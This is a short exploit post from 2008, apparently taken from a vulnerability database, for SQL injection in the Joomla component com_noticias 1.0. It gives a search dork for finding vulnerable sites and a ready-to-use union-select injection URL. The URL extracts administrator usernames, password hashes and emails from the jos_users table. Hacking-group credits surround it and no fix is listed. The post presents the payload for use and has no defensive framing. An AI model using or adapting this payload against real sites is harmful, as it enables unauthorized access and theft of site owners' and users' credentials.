Joomla Component com_noticias 1.0 SQL Injection Vulnerability

2008-02-07 00:00:00

## ##
## ##
## ##
###CoRPITX
###
## ##
## ##
## ##

########################### Turkey ####################################
# #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
# joomla (com_noticias)SQL Injection Vulnerability
#
#######################################################################
#
# AUTHOR : xcorpitx
#
# HOME : www.Hayalet-hack.com / www.zone-turk.net/
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU LL SEE ADMÝN NAME,ADMIN HASH AND EMAÝL
########################################################################
#
# DorK : ''com_noticias''
#
########################################################################
#
# EXPLOIT:
#
########################################################################
#
index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email),2,3,4,5/**/%20from/**/%20jos_users/*
#
########################################################################

Thanks my friends : Hayalet,D3NGES!Z,PC FARESi,SMOKÝN,MOSTBÝG

#

Fixes

No fixes

In order to submit a new fix you need to be registered.